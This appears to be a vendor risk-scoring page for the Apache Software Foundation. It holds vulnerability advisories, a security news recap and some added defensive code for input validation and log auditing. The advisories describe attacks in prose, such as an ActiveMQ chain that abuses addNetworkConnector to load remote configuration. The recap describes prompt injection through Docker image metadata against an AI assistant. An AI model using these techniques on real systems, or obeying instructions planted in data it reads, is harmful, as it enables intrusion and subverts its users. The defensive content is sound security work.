ASF A.I CyberSecurity Scoring
ASF
Company Information
Website: https://www.apache.org
Employees number: 2,368
Number of followers: 79,547
NAICS: 5112
Industry Type: Software Development
Homepage: apache.org
ASF Risk Score (AI oriented)
Between 550 and 599 (ASF, Software Development)
Updated: 04/06/2026
565/1000 - Very Poor (grade Ca)
ASF Global Score (TPRM): score locked
Current Score: 565, grade Ca (VERY POOR), on a 0 to 1000 scale
24 incidents
-14.86 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026
Vulnerability | 03 Jun 2026 | ASF | Score 569 -> 565 (CRITICAL, impact -4) | Incident ID: THE1780489477
Apache Software Foundation: Critical Apache ActiveMQ Vulnerability Exposes Systems to Security Header Injection Attacks
Critical Vulnerabilities in Apache ActiveMQ Demand Immediate Patching
Apache ActiveMQ users must apply urgent security updates following the disclosure of two critical vulnerabilities, CVE-2026-42253 and CVE-2026-49157, that expose systems to HTTP header injection and privilege escalation risks.
CVE-2026-42253: HTTP Response Header Injection via JMS Properties
Affected versions of Apache ActiveMQ and its web components (prior to 5.19.7 and 6.2.6) contain a flaw in the MessageServlet component, where JMS message properties are unsafely copied into HTTP response headers without validation. This allows attackers to inject or manipulate headers, including Content-Security-Policy, Set-Cookie, and Access-Control-Allow-Origin, leading to potential cross-site scripting (XSS), session hijacking, cache poisoning, or security control bypasses. The vulnerability is exploitable in environments where the web console is exposed, particularly in loosely secured messaging setups.
CVE-2026-49157: Improper Jolokia Authorization
The second flaw affects the Jolokia management interface, where default authorization settings are overly permissive. Authenticated low-privilege users can retain access to administrative operations, such as modifying queues, enabling unauthorized configuration changes or messaging disruptions. This issue also impacts versions before 5.19.7 and 6.2.6.
Impact and Mitigation
Both vulnerabilities are rated "important" by the Apache Software Foundation. Exploitation could result in security control bypasses, privilege escalation, or infrastructure abuse. Apache has addressed the issues by disabling the vulnerable MessageServlet by default in patched releases (5.19.7 and 6.2.6). Security researchers Vishal Shukla, pyn3rd, uname, 4ra1n, and Leon Johnson were credited with discovering the flaws, underscoring risks in default configurations and input validation.
Organizations using affected versions should upgrade immediately, restrict management interface access, and audit JMS message flows to mitigate exposure.
MAY 2026
Vulnerability | 22 May 2026 | ASF | Score 572 -> 568 (CRITICAL, impact -4) | Incident ID: THE1779798415
Apache Software Foundation: Apache CXF LDAP Injection Vulnerability Let Attacker Retrieve Arbitrary Certificates
Apache CXF LDAP Injection Flaw (CVE-2026-44930) Exposes Digital Certificates
A critical vulnerability in Apache CXF, tracked as CVE-2026-44930, has been disclosed, posing risks to enterprises using its XKMS (XML Key Management Specification) services for certificate management. The flaw, rated as important severity, stems from improper input validation in the LDAP-based certificate repository component, enabling attackers to extract arbitrary digital certificates from vulnerable systems.
The issue affects Apache CXF versions 4.2.0 before 4.2.1, 4.0.0 through 4.1.5, and all versions prior to 3.6.11. Exploitation occurs when attackers craft malicious LDAP queries to manipulate search filters, bypassing access controls and retrieving certificates beyond their authorized scope. While the vulnerability does not permit remote code execution, compromised certificates could facilitate impersonation, encrypted traffic interception, or lateral movement within corporate networks.
The flaw was publicly disclosed on May 22, 2026, via the Apache developer mailing list. The Apache Software Foundation has released patched versions (4.2.1, 4.1.6, and 3.6.11) that implement stricter input validation to mitigate LDAP injection risks. Organizations using affected versions, particularly those leveraging XKMS for certificate lifecycle management, are urged to upgrade immediately.
The incident underscores the persistent threat of injection vulnerabilities in enterprise middleware, where even modern frameworks can expose sensitive cryptographic assets if directory query handling is flawed.
MAY 2026
Vulnerability | 15 May 2026 | ASF | Score 576 -> 571 (CRITICAL, impact -5) | Incident ID: THE1779207955
Apache Software Foundation: Critical Apache Flink Vulnerability Enables Remote Code Execution Attacks
Critical RCE Vulnerability in Apache Flink Exposes Distributed Data Processing Clusters
A newly disclosed critical vulnerability in Apache Flink (CVE-2026-35194) enables remote code execution (RCE) via SQL injection flaws in the platform’s code generation engine. The flaw stems from improper sanitization of user-supplied input in Flink’s SQL-to-Java translation process, allowing authenticated attackers with query submission privileges to inject malicious payloads and execute arbitrary code on TaskManager nodes.
The vulnerability affects JSON functions (introduced in Flink 1.15.0) and LIKE expressions with ESCAPE clauses (introduced in 1.17.0). By crafting specially designed SQL queries, attackers can manipulate the code generation process, breaking out of string literals to inject Java expressions or method calls. Successful exploitation could lead to full cluster compromise, data manipulation, or lateral movement within the environment, posing heightened risks in multi-tenant or shared deployments.
Affected Versions:
- Apache Flink 1.15.0 – 1.20.x (before 1.20.4)
- Apache Flink 2.0.0 – 2.x (before 2.0.2, 2.1.2, or 2.2.1)
The issue was publicly disclosed by Apache contributor Martijn Visser on May 15, 2026, and rated critical due to its potential impact on production clusters. Apache has released patched versions (1.20.4, 2.0.2, 2.1.2, 2.2.1) to mitigate the flaw. Organizations are advised to upgrade immediately, restrict query submission privileges, monitor for anomalous SQL activity, and implement runtime security controls on TaskManager nodes.
MAY 2026
Vulnerability | 04 May 2026 | ASF | Score 579 -> 574 (CRITICAL, impact -5) | Incident ID: THE1777962299
Apache Software Foundation: Apache HTTP Server Vulnerability Exposes Millions to Remote Code Execution Threats
Apache HTTP Server Patched for Critical RCE Vulnerability (CVE-2026-23918)
The Apache Software Foundation has released an urgent security update to address a severe vulnerability (CVE-2026-23918) in the Apache HTTP Server, which could allow remote code execution (RCE) on affected systems. The flaw, classified as a "double free" memory corruption issue, stems from improper handling of HTTP/2 "early reset" commands, causing the server to free the same memory block twice.
Exploitation of this bug could lead to server crashes (resulting in denial-of-service attacks) or, in worst-case scenarios, enable attackers to execute arbitrary code, gain control of the system, steal data, or deploy ransomware. The vulnerability affects Apache HTTP Server version 2.4.66 with HTTP/2 enabled, posing a significant risk due to the server’s widespread use.
Discovered by researchers Bartłomiej Dmitruk (striga.ai) and Stanisław Strzałkowski (isec.pl), the flaw was privately reported to Apache on December 10, 2025. While a fix was implemented the following day, the official patch was released on May 4, 2026, as part of version 2.4.67. Administrators are advised to update immediately or disable HTTP/2 as a temporary mitigation. Unusual HTTP/2 traffic or server crashes in logs may indicate attempted exploitation.
APRIL 2026
Vulnerability | 01 Apr 2026 | ASF | Score 578 -> 573 (CRITICAL, impact -5) | Incident ID: THE1776083789
Apache Software Foundation: Apache Tomcat Vulnerability Enables Bypass of EncryptInterceptor Protection
Apache Tomcat Patches Critical Vulnerabilities Exposing Encryption and Certificate Validation Flaws
Apache Tomcat has released urgent security updates addressing three critical vulnerabilities that could allow attackers to bypass encryption protections or exploit flawed certificate validation in enterprise web environments.
The first flaw, CVE-2026-29146, affects Tomcat’s EncryptInterceptor component, which secures session data using CBC-mode encryption. Researchers discovered the implementation was vulnerable to a padding oracle attack, enabling attackers to analyze server responses and extract sensitive encrypted data. Impacted versions include Tomcat 11.0.0-M1 to 11.0.18, 10.1.0-M1 to 10.1.52, and 9.0.13 to 9.0.115.
A subsequent patch for CVE-2026-29146 introduced a second vulnerability, CVE-2026-34486, due to a coding error that allowed attackers to bypass EncryptInterceptor entirely. This flaw affects Tomcat 11.0.20, 10.1.53, and 9.0.116, leaving systems exposed despite prior remediation efforts.
The third issue, CVE-2026-34500, involves Tomcat’s Online Certificate Status Protocol (OCSP) validation. In configurations using the Foreign Function and Memory API, revoked or invalid certificates could be incorrectly accepted, even with soft-fail disabled. Affected versions span Tomcat 11.0.0-M14 to 11.0.20, 10.1.22 to 10.1.53, and 9.0.92 to 9.0.116, potentially granting unauthorized access to attackers using compromised certificates.
Apache has released fixed versions (Tomcat 11.0.21, 10.1.54, and 9.0.117) and urges administrators to upgrade immediately, particularly if EncryptInterceptor or certificate-based authentication is enabled. The vulnerabilities underscore the risks of incomplete patches and the need for rigorous validation in web infrastructure security.
MARCH 2026
Cyber Attack | 21 Mar 2026 | ASF | Score 596 -> 576 (CRITICAL, impact -20) | Incident ID: THEAQU1774117492
Organizations using Trivy GitHub Action and Aqua Security: Cyber Security News ®’s Post
Sophisticated Supply Chain Attack Compromises Trivy GitHub Action, Exposing CI/CD Pipelines Globally
In late March 2026, a high-impact supply chain attack targeted the official Trivy GitHub Action (aquasecurity/trivy-action), a widely used security scanning tool in continuous integration and continuous deployment (CI/CD) pipelines. Threat actors executed a force-push attack, compromising 75 out of 76 existing version tags to distribute a malicious infostealer designed to exfiltrate credentials.
This incident is the second Trivy-related compromise in a single month, raising concerns about a potential pattern of targeted attacks. With over 10,000 GitHub workflows relying on the affected action, the breach exposes a vast number of organizations to credential theft, undermining the very tool meant to secure their pipelines.
The attack highlights the escalating risk of supply chain vulnerabilities in CI/CD environments, where trusted dependencies can become vectors for exploitation. Security teams are advised to prioritize strict version control, dependency validation, and continuous monitoring to mitigate similar threats. The incident underscores the need for rigorous verification of third-party tools, even those positioned as security solutions.
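The "strict version control" the summary recommends comes down to one check on a workflow file: a step that references an action by tag (`@v4`, `@0.28.0`) resolves to whatever that tag points at today, so a force-pushed tag silently swaps the code; a step pinned to a full commit SHA does not move. The following is an added example, not code from the page, from Aqua Security or from GitHub: a small stdlib-only scanner that flags every `uses:` reference in a workflow that is not pinned to a 40-character commit SHA. The workflow text and the SHA in it are constructed sample input; the version tags in it are used only as illustrative strings.

```python
import re

# A "uses:" step line; the capture is the action reference, e.g. owner/repo@ref.
USES_RE = re.compile(r'^\s*-?\s*uses:\s*["\']?([^\s"\'#]+)')
# A full-length commit SHA (40 hex chars). Only this form is immutable:
# tags and branch names can be moved, a commit id cannot.
SHA_RE = re.compile(r'^[0-9a-f]{40}$')


def find_mutable_action_refs(workflow_text: str):
    """Return (line_number, action, ref) for every third-party action
    whose reference is not a full commit SHA."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        match = USES_RE.match(line)
        if not match:
            continue
        ref = match.group(1)
        # Local actions and container images are outside this check.
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        action, _, version = ref.partition("@")
        if SHA_RE.match(version):
            continue  # pinned: a rewritten tag cannot change what this runs
        findings.append((lineno, action, version or "<none>"))
    return findings


# Constructed workflow (sample input, not taken from any real repository).
# The 40-hex value below is a placeholder, not a real commit id.
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run Trivy
        uses: aquasecurity/trivy-action@0.28.0
        with:
          scan-type: fs
      - uses: actions/upload-artifact@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
"""

if __name__ == "__main__":
    for lineno, action, version in find_mutable_action_refs(SAMPLE_WORKFLOW):
        print(f"line {lineno}: {action}@{version} is not pinned to a commit SHA")
```

Run against the sample, the scanner reports lines 7 and 9 (the tag-pinned checkout and Trivy steps) and accepts the SHA-pinned upload step. Pinning by SHA is only half of the control: the pinned commit still has to be refreshed deliberately when the upstream publishes a fix, which is why the summary pairs version control with dependency validation and monitoring.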
MARCH 2026
Vulnerability | 03 Mar 2026 | ASF | Score 598 -> 594 (HIGH, impact -4) | Incident ID: THE1772800402
Apache Software Foundation: Apache ActiveMQ Vulnerability Allows Attackers to Trigger DoS Attacks with Malformed Packets
Critical DoS Vulnerability in Apache ActiveMQ Exposes Systems to Disruption
A severe vulnerability in Apache ActiveMQ, a widely used open-source message broker, has been disclosed, allowing threat actors to trigger Denial-of-Service (DoS) conditions by exploiting improper validation in MQTT packet handling. Tracked as CVE-2025-66168, the flaw affects multiple ActiveMQ components, including the core broker, All module, and MQTT transport module.
The vulnerability was reported by Christopher L. Shannon on March 3, 2026, via the Apache users mailing list. ActiveMQ, which facilitates communication between distributed systems using protocols like MQTT, AMQP, and OpenWire, is particularly critical in IoT deployments and microservices architectures.
The issue stems from improper validation of the “remaining length” field in MQTT control packets. According to the MQTT v3.1.1 specification, this field is limited to four bytes to prevent overflow. However, affected ActiveMQ versions fail to enforce this restriction, allowing attackers to craft malformed packets that trigger an integer overflow during decoding. This causes the broker to misinterpret the payload, leading to resource exhaustion or service disruption.
Exploitation requires an authenticated MQTT session, meaning attackers must first establish a valid connection. While the flaw does not enable remote code execution or data breaches, it can cripple message delivery, disrupting IoT networks and microservices reliant on ActiveMQ. Systems not using MQTT transport connectors remain unaffected.
The vulnerability impacts the following versions:
- Apache ActiveMQ (core): Before 5.19.2, 6.0.0–6.1.8, and 6.2.0
- Apache ActiveMQ All Module: Before 5.19.2, 6.0.0–6.1.8, and 6.2.0
- Apache ActiveMQ MQTT Module: Before 5.19.2, 6.0.0–6.1.8, and 6.2.0
Apache has released patches in versions 5.19.2, 6.1.9, and 6.2.1, which enforce proper validation of the “remaining length” field to prevent overflow. The flaw highlights the risks of protocol parsing oversights in message brokers, which can lead to widespread availability issues in connected systems.
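The "remaining length" check the patch enforces is a small piece of protocol parsing, so it is worth seeing what a correct decoder looks like. The MQTT v3.1.1 fixed header encodes Remaining Length as one to four bytes, seven data bits each with the top bit as a continuation flag, for a maximum of 268,435,455; a decoder that keeps multiplying while the continuation bit is set, without counting bytes, is the overflow the summary describes. The code below is an added example written for this page, not the ActiveMQ project's code or its patch, and the packets in it are constructed, not captured traffic.

```python
# Limits from the MQTT v3.1.1 fixed header definition: Remaining Length is
# at most 4 bytes, 7 data bits each, so the largest value is 0xFF 0xFF 0xFF 0x7F.
MAX_REMAINING_LENGTH_BYTES = 4
MAX_REMAINING_LENGTH = 268_435_455


class MalformedPacket(ValueError):
    """Raised when a fixed header violates the encoding rules."""


def decode_remaining_length(packet: bytes, offset: int = 1):
    """Decode the variable-length Remaining Length starting at `offset`.

    Returns (remaining_length, offset_of_first_byte_after_it). The byte
    count is checked on every iteration, so the multiplier never grows past
    128**3 regardless of how many continuation bits the sender sets.
    """
    multiplier = 1
    value = 0
    consumed = 0
    while True:
        if offset + consumed >= len(packet):
            raise MalformedPacket("truncated Remaining Length")
        enc = packet[offset + consumed]
        consumed += 1
        value += (enc & 0x7F) * multiplier
        if not enc & 0x80:  # continuation bit clear: this was the last byte
            return value, offset + consumed
        if consumed >= MAX_REMAINING_LENGTH_BYTES:
            raise MalformedPacket("Remaining Length longer than 4 bytes")
        multiplier *= 128


def encode_remaining_length(n: int) -> bytes:
    """Inverse of the decoder, used here to build test vectors."""
    if not 0 <= n <= MAX_REMAINING_LENGTH:
        raise ValueError("Remaining Length out of range")
    out = bytearray()
    while True:
        byte = n % 128
        n //= 128
        if n:
            byte |= 0x80
        out.append(byte)
        if not n:
            return bytes(out)


def parse_fixed_header(packet: bytes) -> dict:
    """Parse control type, flags and Remaining Length, and verify the declared
    length matches the bytes actually present before anything else is decoded."""
    if not packet:
        raise MalformedPacket("empty packet")
    control_type = packet[0] >> 4
    flags = packet[0] & 0x0F
    if control_type in (0, 15):
        raise MalformedPacket("reserved control packet type")
    remaining, body_start = decode_remaining_length(packet)
    actual = len(packet) - body_start
    if actual != remaining:
        raise MalformedPacket(f"declared {remaining} body bytes, got {actual}")
    return {"type": control_type, "flags": flags,
            "remaining_length": remaining, "body": packet[body_start:]}


# Constructed samples: a PINGREQ (type 12, no payload) and a header whose
# Remaining Length keeps the continuation bit set into a fifth byte.
PINGREQ = bytes([0xC0, 0x00])
OVERLONG = bytes([0x30, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F])

if __name__ == "__main__":
    print(parse_fixed_header(PINGREQ))
    try:
        parse_fixed_header(OVERLONG)
    except MalformedPacket as exc:
        print("rejected:", exc)
```

The two checks that matter for availability are the byte cap inside the loop and the comparison of the declared length against the bytes on hand; together they stop a single malformed header from driving the broker into a huge allocation or a wait for data that never arrives.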
FEBRUARY 2026
Vulnerability | 03 Feb 2026 | ASF | Score 599 -> 594 (CRITICAL, impact -5) | Incident ID: THE1770108756
Apache Software Foundation: Apache Syncope Vulnerability Allows Attackers to Hijack Active User Sessions
Critical XXE Vulnerability Discovered in Apache Syncope IAM Platform
Apache Syncope, a widely used open-source identity and access management (IAM) solution, has disclosed a critical XML External Entity (XXE) vulnerability in its Console component. Tracked as CVE-2026-23795, the flaw allows authenticated administrators to execute XXE attacks, potentially extracting sensitive data from affected systems.
The vulnerability was discovered by security researchers Follycat and Y0n3er and stems from improper restrictions on XML External Entity references in the Syncope Console. Exploiting this flaw, attackers with administrative access can craft malicious XML payloads via Keymaster parameters, enabling unauthorized file reads, internal system access, and potential privilege escalation within IAM infrastructure.
The issue affects Apache Syncope versions 3.0–3.0.15 and 4.0–4.0.3, impacting thousands of global deployments. Given the platform’s role in managing authentication and authorization, compromised session tokens could grant attackers access to user accounts and sensitive organizational resources.
Apache has released patched versions (3.0.16 and 4.0.4) that implement hardened XML parsing to mitigate the risk. Organizations are advised to upgrade immediately to prevent exploitation. The vulnerability underscores the importance of securing administrative access in IAM environments, where misconfigurations can lead to severe data breaches.
JANUARY 2026
Vulnerability | 01 Jan 2026 | ASF | Score 604 -> 594 (CRITICAL, impact -10) | Incident ID: THE1773066267
Apache Software Foundation: Apache ZooKeeper Vulnerability Allows Attackers to Access Sensitive Data
Apache ZooKeeper Patches Critical Flaws Exposing Sensitive Data and Enabling Server Spoofing
The Apache Software Foundation (ASF) has released urgent security patches for Apache ZooKeeper, addressing two high-severity vulnerabilities that could lead to sensitive data exposure and server impersonation attacks in distributed systems.
The first flaw, CVE-2026-24308, stems from improper log sanitization in the ZKConfig component, which inadvertently logs configuration values including credentials and environment settings in plain text at the INFO level. Since INFO logging is enabled by default in production, attackers with access to logs could extract confidential data. Security researcher Youlong Chen disclosed the issue, which affects ZooKeeper versions 3.8.0–3.8.5 and 3.9.0–3.9.4.
The second vulnerability, CVE-2026-24281, involves a hostname verification bypass in the ZKTrustManager. When standard IP-based Subject Alternative Name (SAN) checks fail, ZooKeeper falls back to reverse DNS (PTR) lookups, allowing attackers to spoof legitimate servers by manipulating PTR records. While exploitation requires a trusted digital certificate, the flaw poses a significant risk in secure environments. Nikita Markevich reported the issue, tracked internally as ZOOKEEPER-4986.
ASF has released patched versions (3.8.6 and 3.9.5), which fix the logging issue by preventing credential exposure and introduce a configuration option to disable reverse DNS lookups. Administrators are advised to upgrade immediately and audit logs for exposed credentials.
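The advice to "audit logs for exposed credentials" is the part an operator has to act on before the upgrade lands, so here is a way to do it. The code below is an added example, not ZooKeeper code or part of the fix: it scans application log lines for key=value pairs whose key looks like a secret and whose value has not been redacted, records the log level each exposure was written at, and offers a redaction helper for anything that has to be kept. The log lines are constructed samples; the property names in them are illustrative, not a claim about which ZooKeeper settings were affected.

```python
import re

# Key names that should never be logged with a plaintext value.
SENSITIVE_KEY_RE = re.compile(
    r"(password|passwd|secret|token|apikey|api_key|privatekey)", re.IGNORECASE)
# key=value pairs as a configuration dumper prints them on one line.
KV_RE = re.compile(r"([A-Za-z0-9_.\-]+)\s*=\s*([^\s,;]+)")
LEVEL_RE = re.compile(r"\b(TRACE|DEBUG|INFO|WARN|ERROR)\b")
REDACTED_VALUES = {"***", "****", "<redacted>", "[REDACTED]"}


def find_exposed_credentials(log_lines):
    """Return one finding per sensitive key whose value appears in clear text."""
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        level_match = LEVEL_RE.search(line)
        level = level_match.group(1) if level_match else "UNKNOWN"
        for key, value in KV_RE.findall(line):
            if SENSITIVE_KEY_RE.search(key) and value not in REDACTED_VALUES:
                findings.append({"line": lineno, "level": level, "key": key})
    return findings


def redact_line(line: str) -> str:
    """Replace the value of every sensitive key on the line with ***."""
    def replace(match):
        key = match.group(1)
        return f"{key}=***" if SENSITIVE_KEY_RE.search(key) else match.group(0)
    return KV_RE.sub(replace, line)


# Constructed log excerpt (not real ZooKeeper output).
SAMPLE_LOG = [
    "2026-01-05 09:12:01,004 [main] INFO  Config - clientPort=2181 dataDir=/var/lib/app",
    "2026-01-05 09:12:01,005 [main] INFO  Config - ssl.keyStore.location=/etc/app/keystore.jks ssl.keyStore.password=hunter2",
    "2026-01-05 09:12:01,006 [main] DEBUG Config - auth.token=***",
    "2026-01-05 09:12:02,110 [main] WARN  Quorum - peer 3 not reachable",
]

if __name__ == "__main__":
    for finding in find_exposed_credentials(SAMPLE_LOG):
        print(f"line {finding['line']} ({finding['level']}): {finding['key']} logged in clear text")
    print(redact_line(SAMPLE_LOG[1]))
```

On the sample the scanner reports only line 2: the keystore password written at INFO. The DEBUG line is ignored because its value is already masked. Recording the level is deliberate: an exposure at INFO, the default production level, means the secret has reached every log shipper and retention tier, and rotation rather than deletion is the right response.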
Vulnerability | 01 Jan 2026 | ASF | Score 604 -> 594 (CRITICAL, impact -10) | Incident ID: THE1775629469
Apache Software Foundation: Claude Identifies Critical 13-Year-Old RCE Vulnerability in Apache ActiveMQ
13-Year-Old Apache ActiveMQ RCE Flaw Discovered by AI Assistant
A critical remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, tracked as CVE-2026-34197, has been uncovered after remaining undetected for 13 years. The flaw allows attackers to execute arbitrary commands by forcing the message broker to download and run a malicious remote configuration file.
The exploit targets Jolokia, a REST API interface in ActiveMQ’s web-based management console. While developers restricted Jolokia to read-only operations in 2023, they retained full permissions for ActiveMQ’s management beans (MBeans), creating a security gap. Attackers can abuse the `addNetworkConnector` operation by supplying a crafted `vm://` URI, which fetches a remote Spring XML file and executes it, granting full system control.
Under normal conditions, exploitation requires administrator credentials (e.g., default `admin:admin`). However, in ActiveMQ versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) removes authentication requirements, enabling unauthenticated RCE.
Security researcher Naveen Sunkavally discovered the vulnerability using Claude AI, which analyzed the codebase in 10 minutes, a task that typically takes human researchers weeks. The AI identified the interaction between Jolokia, JMX, and network connectors, demonstrating the growing role of AI in vulnerability hunting.
ActiveMQ has been a frequent target for ransomware groups and nation-state actors, making this a high-priority patch. Organizations are advised to upgrade to versions 5.19.4 or 6.2.3, which remove the dangerous `vm://` transport capability from remote operations. Additional mitigations include changing default credentials, monitoring logs for suspicious `vm://` URIs, and watching for unexpected POST requests to `/api/jolokia/` containing `addNetworkConnector`.
DECEMBER 2025
Vulnerability | 01 Dec 2025 | ASF | Score 604 -> 600 (HIGH, impact -4) | Incident ID: THE1764583470
The Apache Software Foundation: Critical Apache bRPC Framework Vulnerability Let Attackers Crash the Server
Critical Stack Overflow Vulnerability in Apache bRPC (CVE-2025-59789)
A critical security vulnerability has been discovered in the Apache bRPC framework that could allow remote attackers to crash servers by sending specially crafted JSON data.
The flaw, tracked as CVE-2025-59789, affects all versions of Apache bRPC before 1.15.0 across all platforms.
The vulnerability exists in the json2pb component of Apache bRPC, which converts JSON data to Protocol Buffer messages.
The component relies on rapidjson for parsing JSON data received from the network. By default, the rapidjson parser uses a recursive parsing method.
When attackers send JSON data with deeply nested recursive structures, the parser function exhausts the stack memory, resulting in a stack overflow.
Field details:
- CVE ID: CVE-2025-59789
- CVSS Score: 9.8 (Critical)
- Attack Vector: Network
- Affected Versions: Apache bRPC < 1.15.0
- Vulnerability Type: Uncontrolled Recursion / Stack Overflow
This causes the server to crash, leading to a denial-of-service condition. Organizations using bRPC servers are at risk if they meet any of the following conditions:
- Running a bRPC server with protobuf messages that handles HTTP+JSON requests from untrusted networks.
- Using the JsonToProtoMessage function to convert JSON from untrusted input sources.
Apache has provided two options to address this security issue:
- Upgrade to Apache bRPC version 1.15.0, which includes the complete fix for this vulnerability.
- Apply the official patch available on GitHub for those unable to upgrade immediately.
Both fixes
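The failure mode here is general: any recursive-descent JSON parser consumes stack in proportion to nesting depth, so untrusted input needs a depth bound that is enforced before recursion starts. The code below is an added example and not bRPC's code, rapidjson's, or the project's patch; it shows the bounding technique itself, an iterative pre-scan that counts bracket depth (ignoring brackets inside string literals and honouring escapes) and rejects the document once a limit is crossed, then hands only accepted input to the real parser. The inputs are constructed.

```python
import json


def max_nesting_depth(text: str, limit: int) -> int:
    """Iteratively measure the deepest array/object nesting in a JSON text.

    Raises ValueError as soon as `limit` is exceeded, so a deeply nested
    document is refused after reading `limit` opening brackets, long before
    any recursive parser would have started descending into it.
    """
    depth = 0
    deepest = 0
    in_string = False
    escaped = False
    for ch in text:
        if in_string:
            # Brackets inside string literals are data, not structure.
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            if depth > limit:
                raise ValueError(f"nesting depth exceeds limit of {limit}")
            deepest = max(deepest, depth)
        elif ch in "]}":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced closing bracket")
    return deepest


def parse_json_bounded(text: str, limit: int = 64):
    """Gate the (recursive) standard-library parser behind the depth check."""
    max_nesting_depth(text, limit)
    return json.loads(text)


# Constructed inputs: an ordinary document whose string value contains
# brackets, and a bracket bomb far deeper than any legitimate payload.
NORMAL = '{"user": {"roles": ["admin", "dev"]}, "note": "[[[not nesting]]]"}'
BOMB = "[" * 100_000 + "]" * 100_000

if __name__ == "__main__":
    print("depth of NORMAL:", max_nesting_depth(NORMAL, 64))
    print(parse_json_bounded(NORMAL)["user"]["roles"])
    try:
        parse_json_bounded(BOMB)
    except ValueError as exc:
        print("rejected:", exc)
```

The limit should reflect the schema actually served (a few dozen levels covers almost all protobuf-shaped messages) rather than the platform's stack size, because the safe depth depends on the thread's stack and on what else is on it. The pre-scan is linear in input size and touches no recursion, so it is cheap to apply to every request from an untrusted network.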
NOVEMBER 2025
Cyber Attack | 01 Nov 2025 | ASF | Score 620 -> 601 (CRITICAL, impact -19) | Incident ID: TP-HIKFOXGOOREVARITHEOPECIS1770645410
OpenClaw, Notepad++, Hikvision, Apache Syncope, Foxit, TP-Link, Cisco, Google Chrome and Arista NG Firewall: ⚡ Weekly Recap: AI Skill Malware, 31Tbps DDoS, Notepad++ Hack, LLM Backdoors and More
Cybersecurity Roundup: Trust Abuse, AI Risks, and Supply Chain Attacks Dominate Threat Landscape
This week’s cybersecurity developments highlight a growing trend: attackers are increasingly exploiting trusted systems (AI platforms, software updates, messaging apps, and open-source ecosystems) to bypass security controls. Below are the key incidents and trends shaping the threat landscape.
### AI and Open-Source Ecosystems Under Siege
OpenClaw, an open-source AI agent framework, has partnered with Google’s VirusTotal to scan uploaded "skills" (AI extensions) for malware, following discoveries of malicious components in its ClawHub marketplace. Researchers warn that AI agents’ broad permissions, persistent memory, and user-controlled configurations create risks like prompt injection, data exfiltration, and supply chain attacks. Trend Micro reported threat actors on Exploit.in discussing OpenClaw for botnet operations, while Veracode noted a surge in typosquatted "claw" packages on npm and PyPI from zero in early 2026 to over 1,000 by February.
Meanwhile, MoltBook, an AI-driven social platform built on OpenClaw, faces scrutiny after Simula Research Laboratory identified 506 prompt injection attacks, social engineering exploits, and unregulated cryptocurrency activity comprising 19.3% of its content. The platform’s autonomous AI agents, which interact without human oversight, raise concerns about data privacy and manipulation risks.
Security firm Pillar Security detected active scanning of exposed OpenClaw gateways (port 18789), with attackers bypassing AI layers to target the WebSocket API directly for authentication bypasses and command execution. Censys identified 21,639 exposed OpenClaw instances as of January 2026, underscoring the framework’s outdated trust model, which lacks encryption-at-rest and containerization.
### Supply Chain Attacks: Trusted Updates as Malware Vectors
A sophisticated supply chain attack targeted Notepad++ between June and December 2025, where threat actors redirected its WinGUp updater to malicious servers. Despite losing access to a compromised hosting provider in September, attackers reused stolen credentials to maintain control until December. The campaign, attributed to Lotus Blossom, exploited weak update verification in older Notepad++ versions, demonstrating how legitimate domains can become malware distribution hubs.
Similarly, Docker’s AI assistant (Ask Gordon) was found vulnerable to remote code execution (RCE) via DockerDash, a flaw in its Model Context Protocol (MCP) Gateway. Attackers could embed malicious instructions in Docker image metadata, which the AI assistant executed without validation. Docker patched the issue in version 4.50.0 (November 2025).
### State-Sponsored Threats and High-Profile Targets
Germany’s BfV and BSI issued a joint advisory warning of state-sponsored phishing attacks via Signal, exploiting the app’s PIN and device-linking features to hijack accounts. Targets included high-ranking officials, military personnel, diplomats, and journalists across Germany and Europe.
In Ukraine, the government implemented a Starlink terminal verification system after confirming Russian forces were using the technology on attack drones. Only registered devices are now permitted to operate in the country.
### DDoS, Botnets, and Emerging Attack Techniques
The AISURU/Kimwolf botnet set a record with a 31.4 Tbps DDoS attack in November 2025, lasting just 35 seconds. Cloudflare mitigated the attack, which was part of a broader campaign ("The Night Before Christmas") starting in December. Overall, DDoS attacks surged 121% in 2025, averaging 5,376 mitigated attacks per hour.
Researchers also uncovered 54 malicious npm packages using EtherHiding, a technique leveraging Ethereum smart contracts to fetch C2 servers, complicating takedown efforts. The malware targets Windows systems with 5+ CPUs, employing sandbox evasion, COM hijacking, and system profiling.
### Linux Threats and Post-Exploitation Frameworks
Cyble discovered ShadowHS, a fileless Linux post-exploitation framework that runs entirely in memory, prioritizing stealth and long-term control. The framework includes modules for credential access, lateral movement, privilege escalation, and data exfiltration, with aggressive defensive tooling enumeration to avoid detection.
### Ransomware, Dark Markets, and Legal Actions
- INC Ransomware suffered a setback after Cyber Centaurs breached its backup server, helping 12 victims recover data. The group, active since 2023, had listed over 100 victims on its leak site.
- Rui-Siang Lin, administrator of the Incognito Market darknet drug marketplace, was sentenced to 30 years in prison for facilitating $105 million in narcotics sales to over 400,000 users.
- Xinbi, a Telegram-based illicit marketplace, processed $17.9 billion in transactions, outlasting competitors like Haowang and Tudou Guarantee, which saw declines of 100% and 74%, respectively.
### Critical Vulnerabilities and Exploits
Notable CVEs disclosed this week include:
- CVE-2026-25049 (n8n)
- CVE-2026-0709 (Hikvision Wireless Access Point)
- CVE-2026-23795 (Apache Syncope)
- CVE-2026-1591/1592 (Foxit PDF Editor Cloud)
- CVE-2026-24512 (ingress-nginx)
- Multiple CVEs in Django, Google Chrome, Cisco, TP-Link, F5 BIG-IP, and Arista NG Firewall
Additionally, XBOW uncovered two Insecure Direct Object Reference (IDOR) flaws in Spree (CVE-2026-22588/22589), allowing unauthorized access to user address data.
### Microsoft’s AI Backdoor Scanner
